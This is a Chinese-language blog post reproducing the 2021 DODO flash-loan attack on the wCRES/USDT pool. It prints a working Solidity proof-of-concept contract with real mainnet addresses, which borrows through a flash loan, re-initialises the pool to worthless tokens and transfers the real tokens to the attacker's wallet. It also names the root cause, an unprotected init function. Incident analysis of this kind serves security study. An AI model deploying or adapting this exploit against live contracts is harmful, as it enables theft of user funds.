<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>dodo_flashloan攻击复现--狸猫换太子 | SCS</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  <meta name="keywords" content="复盘分析、闪电贷" />
  
  
  
  
  <meta name="description" content="通过事件最后的状态可知，攻击者地址减少的两种空气币数额与攻击合约增加的WrappedERC20、TetherToken数额一一对应，相当于将DVM合约中WrappedERC20、TetherToken的两种币”等价的“交换为两种空气币。 攻击简述 交易哈希： 10x395675b56370a9f5fe8b32badfa80043f5291443bd6c8273900476880fb5221e">
<meta property="og:type" content="article">
<meta property="og:title" content="DODO_FlashLoan攻击复现--狸猫换太子">
<meta property="og:url" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="SCS">
<meta property="og:description" content="通过事件最后的状态可知，攻击者地址减少的两种空气币数额与攻击合约增加的WrappedERC20、TetherToken数额一一对应，相当于将DVM合约中WrappedERC20、TetherToken的两种币”等价的“交换为两种空气币。 攻击简述 交易哈希： 10x395675b56370a9f5fe8b32badfa80043f5291443bd6c8273900476880fb5221e">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210925204033395.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210925210916212.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927092451496.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927092549154.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093126488.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093214508.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093647267.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093947219.png">
<meta property="og:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927101352668.png">
<meta property="article:published_time" content="2021-09-27T02:42:40.000Z">
<meta property="article:modified_time" content="2021-09-27T04:37:28.862Z">
<meta property="article:author" content="Janson Woods">
<meta property="article:tag" content="复盘分析、闪电贷">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210925204033395.png">
  

  

  <link rel="icon" href="/css/images/mylogo.jpg">
  <link rel="apple-touch-icon" href="/css/images/mylogo.jpg">
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link href="https://fonts.googleapis.com/css?family=Open+Sans|Montserrat:700" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Roboto:400,300,300italic,400italic" rel="stylesheet" type="text/css">
  <link href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet">
  <style type="text/css">
    @font-face{font-family:futura-pt; src:url("/css/fonts/FuturaPTBold.otf") format("woff");font-weight:500;font-style:normal;}
    @font-face{font-family:futura-pt-light; src:url("/css/fonts/FuturaPTBook.otf") format("woff");font-weight:lighter;font-style:normal;}
    @font-face{font-family:futura-pt-italic; src:url("/css/fonts/FuturaPTBookOblique.otf") format("woff");font-weight:400;font-style:italic;}
}

  </style>
  
<link rel="stylesheet" href="/css/style.css">


  
<script src="/js/jquery-3.1.1.min.js"></script>

  
<script src="/js/bootstrap.js"></script>


  <!-- Bootstrap core CSS -->
  <link rel="stylesheet" href="/css/bootstrap.css" >

  
    
<link rel="stylesheet" href="/css/dialog.css">

  

  

  
    <link rel="stylesheet" href="/css/header-post.css" >
  

  
  
  

<meta name="generator" content="Hexo 5.4.0"></head>



  <body data-spy="scroll" data-target="#toc" data-offset="50">


  
  <div id="container">
    <div id="wrap">
      
        <header>

    <div id="allheader" class="navbar navbar-default navbar-static-top" role="navigation">
        <div class="navbar-inner">
          
          <div class="container"> 
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
              <span class="sr-only">Toggle navigation</span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
            </button>

            
              <a class="brand" style="
                 margin-top: 0px;"  
                href="#" data-toggle="modal" data-target="#myModal" >
                  <img width="124px" height="124px" alt="Hike News" src="/css/images/mylogo.jpg">
              </a>
            
            
            <div class="navbar-collapse collapse">
              <ul class="hnav navbar-nav">
                
                  <li> <a class="main-nav-link" href="/">Home</a> </li>
                
                  <li> <a class="main-nav-link" href="/archives">Archives</a> </li>
                
                  <li> <a class="main-nav-link" href="/categories">Categories</a> </li>
                
                  <li><div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div></li>
            </div>
          </div>
                
      </div>
    </div>

</header>



      
            
      <div id="content" class="outer">
        
          <section id="main" style="float:none;"><article id="post-DODO-flashloan攻击分析与复现" style="width: 75%; float:left;" class="article article-type-post" itemscope itemprop="blogPost" >
  <div id="articleInner" class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="thumb" class="article-title" itemprop="name">
      DODO_FlashLoan攻击复现--狸猫换太子
    </h1>
  

      </header>
    
    <div class="article-meta">
      
	<a href="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/" class="article-date">
	  <time datetime="2021-09-27T02:42:40.000Z" itemprop="datePublished">2021-09-27</time>
	</a>

      
      
	<a class="article-views">
	<span id="busuanzi_container_page_pv">
		PV:<span id="busuanzi_value_page_pv"></span>
	</span>
	</a>

      

    </div>
    <div class="article-entry" itemprop="articleBody">
      
        <p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210925204033395.png" alt="image-20210925204033395"></p>
<p>通过事件最后的状态可知，攻击者地址减少的两种空气币数额与攻击合约增加的WrappedERC20、TetherToken数额一一对应，相当于将DVM合约中WrappedERC20、TetherToken的两种币”等价的“交换为两种空气币。</p>
<h3 id="攻击简述"><a href="#攻击简述" class="headerlink" title="攻击简述"></a>攻击简述</h3><p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210925210916212.png" alt="image-20210925210916212"></p>
<p>交易哈希：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x395675b56370a9f5fe8b32badfa80043f5291443bd6c8273900476880fb5221e</span><br></pre></td></tr></table></figure>



<h3 id="攻击复现"><a href="#攻击复现" class="headerlink" title="攻击复现"></a>攻击复现</h3><h4 id="1-发两种空气币token1，token2"><a href="#1-发两种空气币token1，token2" class="headerlink" title="1.发两种空气币token1，token2."></a>1.发两种空气币token1，token2.</h4><p>erc20代币合约</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">/ SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity &gt;=0.8.0 &lt;0.9.0;</span><br><span class="line"></span><br><span class="line">import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;</span><br><span class="line">import &quot;@openzeppelin/contracts/access/Ownable.sol&quot;;</span><br><span class="line"></span><br><span class="line">contract _ERC20 is ERC20, Ownable &#123;</span><br><span class="line">    </span><br><span class="line">    uint8 private currentDecimals;</span><br><span class="line">    enum TOKEN_TYPE &#123;CAPPED,UNCAPPED&#125;</span><br><span class="line">    TOKEN_TYPE public tokenType;</span><br><span class="line">    </span><br><span class="line">    constructor(</span><br><span class="line">        string memory _name, </span><br><span class="line">        string memory _symbol,</span><br><span class="line">        uint8 _decimals,</span><br><span class="line">        uint256 _initialSupply,</span><br><span class="line">        TOKEN_TYPE _tokenType</span><br><span class="line">    ) ERC20(_name, _symbol) &#123;</span><br><span class="line">        currentDecimals = _decimals;</span><br><span class="line">        tokenType = _tokenType;</span><br><span class="line">        / mint token to the address of the account that sent the transaction.</span><br><span class="line">        transferOwnership(tx.origin);</span><br><span class="line">        _mint(tx.origin, _initialSupply * (10**uint256(_decimals)));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    modifier unCapped &#123;</span><br><span class="line">      require(tokenType == _ERC20.TOKEN_TYPE.UNCAPPED,&quot;support only uncapped token&quot;);</span><br><span class="line">      _;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function decimals() public view virtual override returns (uint8) &#123;</span><br><span class="line">        return currentDecimals;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function mint(address _address,uint256 _amount) public unCapped onlyOwner returns (bool) &#123;</span><br><span class="line">        _mint(_address,_amount);</span><br><span class="line">        return true;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function burn(address _address,uint256 _amount) public unCapped onlyOwner returns (bool) &#123;</span><br><span class="line">        _burn(_address,_amount);</span><br><span class="line">        return true;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>token1：</p>
<p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927092451496.png" alt="image-20210927092451496"></p>
<p>token2：</p>
<p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927092549154.png" alt="image-20210927092549154"></p>
<h4 id="2-将空气币打入wCRES-USDT交易对"><a href="#2-将空气币打入wCRES-USDT交易对" class="headerlink" title="2.将空气币打入wCRES/USDT交易对"></a>2.将空气币打入<code>wCRES/USDT</code>交易对</h4><p>wCRES/USDT 地址：0x051EBD717311350f1684f89335bed4ABd083a2b6</p>
<p>各打入足量的数量（10000000000000000000000000000）。</p>
<p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093126488.png" alt="image-20210927093126488"></p>
<p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093214508.png" alt="image-20210927093214508"></p>
<h4 id="3-修改攻击合约参数"><a href="#3-修改攻击合约参数" class="headerlink" title="3.修改攻击合约参数"></a>3.修改攻击合约参数</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br></pre></td><td class="code"><pre><span class="line">/**</span><br><span class="line"> *Submitted for verification at Etherscan.io on 2021-01-22</span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line"></span><br><span class="line">    Copyright 2020 DODO ZOO.</span><br><span class="line">    SPDX-License-Identifier: Apache-2.0</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">pragma solidity 0.6.9;</span><br><span class="line">pragma experimental ABIEncoderV2;</span><br><span class="line"></span><br><span class="line">interface DVM&#123;</span><br><span class="line">    </span><br><span class="line">    function flashLoan(</span><br><span class="line">        uint256 baseAmount,</span><br><span class="line">        uint256 quoteAmount,</span><br><span class="line">        address assetTo,</span><br><span class="line">        bytes calldata data</span><br><span class="line">    ) external;</span><br><span class="line">    </span><br><span class="line">    function init(</span><br><span class="line">        address maintainer,</span><br><span class="line">        address baseTokenAddress,</span><br><span class="line">        address quoteTokenAddress,</span><br><span class="line">        uint256 lpFeeRate,</span><br><span class="line">        address mtFeeRateModel,</span><br><span class="line">        uint256 i,</span><br><span class="line">        uint256 k,</span><br><span class="line">        bool isOpenTWAP</span><br><span class="line">    ) external;        </span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">interface Token &#123;</span><br><span class="line">    function balanceOf(address account) external view returns (uint);</span><br><span class="line">    function transfer(address recipient, uint amount) external returns (bool);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">interface USDT&#123;</span><br><span class="line">    /USDT 并没有完全遵循 ERC20 标准 所以其接口需单独定义</span><br><span class="line">    function transfer(address to, uint value) external;</span><br><span class="line">    function balanceOf(address account) external view returns (uint);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">contract poc&#123;</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    uint256 wCRES_amount =  130000000000000000000000;</span><br><span class="line">    </span><br><span class="line">    uint256 usdt_amount =  1100000000000;</span><br><span class="line">    </span><br><span class="line">    address wCRES_token = 0xa0afAA285Ce85974c3C881256cB7F225e3A1178a;</span><br><span class="line">    </span><br><span class="line">    address usdt_token = 0xdAC17F958D2ee523a2206206994597C13D831ec7;</span><br><span class="line">    </span><br><span class="line">    address maintainer = 0x95C4F5b83aA70810D4f142d58e5F7242Bd891CB0;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    / 这里是刚生成的Token1地址</span><br><span class="line">    address token1 = 0x9431cc8868a6a9993E25C7abB93aD2aca5592c5C;</span><br><span class="line">    / 这里是刚生成的Token2地址</span><br><span class="line">    address token2 = 0x445390C704Ed94F2F719d0eb7cda2633a72753A5;</span><br><span class="line">    </span><br><span class="line">    uint256 lpFeeRate = 3000000000000000;</span><br><span class="line">    </span><br><span class="line">    address mtFeeRateModel = 0x5e84190a270333aCe5B9202a3F4ceBf11b81bB01;</span><br><span class="line">    </span><br><span class="line">    uint256 i = 1;</span><br><span class="line">    </span><br><span class="line">    uint256 k = 1000000000000000000;</span><br><span class="line">    </span><br><span class="line">    bool isOpenTWAP = false;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    / 这里填你的测试地址</span><br><span class="line">    address  wallet = ;</span><br><span class="line">    </span><br><span class="line">    address dvm_wCRES_USDT =  0x051EBD717311350f1684f89335bed4ABd083a2b6;</span><br><span class="line">    </span><br><span class="line">    bytes data = abi.encodeWithSignature(&quot;init(address,address,address,uint256,address,uint256,uint256,bool)&quot;,maintainer,token1,token2,lpFeeRate,mtFeeRateModel,i,k,isOpenTWAP);</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    function attack() public &#123;</span><br><span class="line">        </span><br><span class="line">        address me = address(this);</span><br><span class="line">        DVM DVM_wCRES_USDT = DVM(dvm_wCRES_USDT);</span><br><span class="line">        DVM_wCRES_USDT.flashLoan(wCRES_amount,usdt_amount,me,&quot; &quot;);</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    function DVMFlashLoanCall(address a, uint256 b, uint256 c, bytes memory d) public&#123;</span><br><span class="line">        </span><br><span class="line">        DVM DVM_wCRES_USDT = DVM(dvm_wCRES_USDT);</span><br><span class="line">        DVM_wCRES_USDT.init(maintainer,token1,token2,lpFeeRate,mtFeeRateModel,i,k,isOpenTWAP);</span><br><span class="line">        </span><br><span class="line">        Token(wCRES_token).transfer(wallet, Token(wCRES_token).balanceOf(address(this)));</span><br><span class="line">        USDT(usdt_token).transfer(wallet, Token(usdt_token).balanceOf(address(this)));</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>该攻击合约主要完成以下工作：</p>
<p>1.调用DVM的闪电贷函数进行闪电贷，将传入的assetTo参数修改为攻击合约。</p>
<p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093647267.png" alt="image-20210927093647267"></p>
<p>2.DVM执行闪电贷逻辑，乐观转账后，调用assetTo地址的DVMFlashLoanCall函数，由于攻击者传入的assetTo参数的值为攻击合约地址，因此会调用攻击合约中的DVMFlashLoanCall函数，</p>
<p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927093947219.png" alt="image-20210927093947219"></p>
<p>在该函数中，对wCRES/USDT 交易对合约（DVM合约）进行初始化函数（init）的调用。使得合约中      交易对地址信息baseTokenAddress,quoteTokenAddress,变为攻击者发行的两个空气币地址。</p>
<p>3.执行闪电贷的赎回操作</p>
<p>由于此时攻击者已将合约的交易对地址信息初始化为两种空气币的地址，并在实现给交易对地址打入了足量的两种空气币。使得DVM合约认为两种空气币就是原来的两种代币，并且是足量的，完成闪电贷最后的检查工作。</p>
<p><img src="/2021/09/27/DODO-flashloan%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/image-20210927101352668.png" alt="image-20210927101352668"></p>
<p>因此本次攻击是因为项目方并没有对初始化加以身份权限设定，使得任何人可以调用init函数。</p>

      
    </div>
    <footer class="article-footer">
      
      
      <div>
        <ul class="post-copyright">
          <li class="post-copyright-author">
          <strong>Post author:  </strong>Janson Woods</a>
          </li>
          <li class="post-copyright-link">
          <strong>Post link:  </strong>
          <a href="/2021/09/27/DODO-flashloan攻击分析与复现/" target="_blank" title="DODO_FlashLoan攻击复现--狸猫换太子">http://example.com/2021/09/27/DODO-flashloan攻击分析与复现/</a>
          </li>
          <li class="post-copyright-license">
            <strong>Copyright Notice:   </strong>
            All articles in this blog are licensed under <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">CC BY-NC-ND 4.0</a>
            unless stating additionally.
          </li>
         
        </ul>
<div>

      
      
        
	<div id="comment">
		<!-- 来必力City版安装代码 -->
		<div id="lv-container" data-id="city" data-uid="MTAyMC8yOTQ4MS82MDQ5">
		<script type="text/javascript">
		   (function(d, s) {
		       var j, e = d.getElementsByTagName(s)[0];

		       if (typeof LivereTower === 'function') { return; }

		       j = d.createElement(s);
		       j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
		       j.async = true;

		       e.parentNode.insertBefore(j, e);
		   })(document, 'script');
		</script>
		<noscript>为正常使用来必力评论功能请激活JavaScript</noscript>
		</div>
		<!-- City版安装代码已完成 -->
	</div>



      
      
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%A4%8D%E7%9B%98%E5%88%86%E6%9E%90%E3%80%81%E9%97%AA%E7%94%B5%E8%B4%B7/" rel="tag">复盘分析、闪电贷</a></li></ul>

      

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/10/15/compound%E4%BB%A3%E5%B8%81%E5%88%86%E5%8F%91%E8%BF%87%E5%A4%9A%E6%BC%8F%E6%B4%9E1012/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Compound第62提案升级导致奖励分发过多
        
      </div>
    </a>
  
  
    <a href="/2021/09/27/EIP1167-%E6%9C%80%E5%B0%8F%E5%90%88%E7%BA%A6%E4%BB%A3%E7%90%86%E7%9A%84%E7%90%86%E8%A7%A3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">EIP1167-最小合约代理的理解</div>
    </a>
  
</nav>

  
</article>

<!-- Table of Contents -->

  <aside id="toc-sidebar">
    <div id="toc" class="toc-article">
    <strong class="toc-title">Contents</strong>
    
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E7%AE%80%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">攻击简述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.</span> <span class="nav-text">攻击复现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%8F%91%E4%B8%A4%E7%A7%8D%E7%A9%BA%E6%B0%94%E5%B8%81token1%EF%BC%8Ctoken2"><span class="nav-number">2.1.</span> <span class="nav-text">1.发两种空气币token1，token2.</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%B0%86%E7%A9%BA%E6%B0%94%E5%B8%81%E6%89%93%E5%85%A5wCRES-USDT%E4%BA%A4%E6%98%93%E5%AF%B9"><span class="nav-number">2.2.</span> <span class="nav-text">2.将空气币打入wCRES&#x2F;USDT交易对</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E4%BF%AE%E6%94%B9%E6%94%BB%E5%87%BB%E5%90%88%E7%BA%A6%E5%8F%82%E6%95%B0"><span class="nav-number">2.3.</span> <span class="nav-text">3.修改攻击合约参数</span></a></li></ol></li></ol>
    
    </div>
  </aside>

</section>
        
      </div>
      
      <footer id="footer">
  

  <div class="container">
      	<div class="row">
	      <p> Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/iTimeTraveler/hexo-theme-hiker" target="_blank">Hexo-theme-hiker</a> </p>
	      <p id="copyRightEn">Copyright &copy; 2013 - 2021 SCS All Rights Reserved.</p>
	      
	      
    		<p class="busuanzi_uv">
				UV : <span id="busuanzi_value_site_uv"></span> |  
				PV : <span id="busuanzi_value_site_pv"></span>
		    </p>
  		   
		</div>

		
  </div>
</footer>


<!-- min height -->

<script>
    var wrapdiv = document.getElementById("wrap");
    var contentdiv = document.getElementById("content");
    var allheader = document.getElementById("allheader");

    wrapdiv.style.minHeight = document.body.offsetHeight + "px";
    if (allheader != null) {
      contentdiv.style.minHeight = document.body.offsetHeight - allheader.offsetHeight - document.getElementById("footer").offsetHeight + "px";
    } else {
      contentdiv.style.minHeight = document.body.offsetHeight - document.getElementById("footer").offsetHeight + "px";
    }
</script>
    </div>
    <!-- <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/categories" class="mobile-nav-link">Categories</a>
  
</nav> -->
    

<!-- mathjax config similar to math.stackexchange -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true
    }
  });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>

<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/scripts.js"></script>





  
<script src="/js/dialog.js"></script>









	<div style="display: none;">
    <script src="https://s95.cnzz.com/z_stat.php?id=1260716016&web_id=1260716016" language="JavaScript"></script>
  </div>



	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
	</script>






  </div>

  <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" style="display: none;">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h2 class="modal-title" id="myModalLabel">设置</h2>
      </div>
      <hr style="margin-top:0px; margin-bottom:0px; width:80%; border-top: 3px solid #000;">
      <hr style="margin-top:2px; margin-bottom:0px; width:80%; border-top: 1px solid #000;">


      <div class="modal-body">
          <div style="margin:6px;">
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseOne" onclick="javascript:setFontSize();" aria-expanded="true" aria-controls="collapseOne">
              正文字号大小
            </a>
          </div>
          <div id="collapseOne" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingOne">
          <div class="panel-body">
            您已调整页面字体大小
          </div>
        </div>
      


          <div style="margin:6px;">
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseTwo" onclick="javascript:setBackground();" aria-expanded="true" aria-controls="collapseTwo">
              夜间护眼模式
            </a>
        </div>
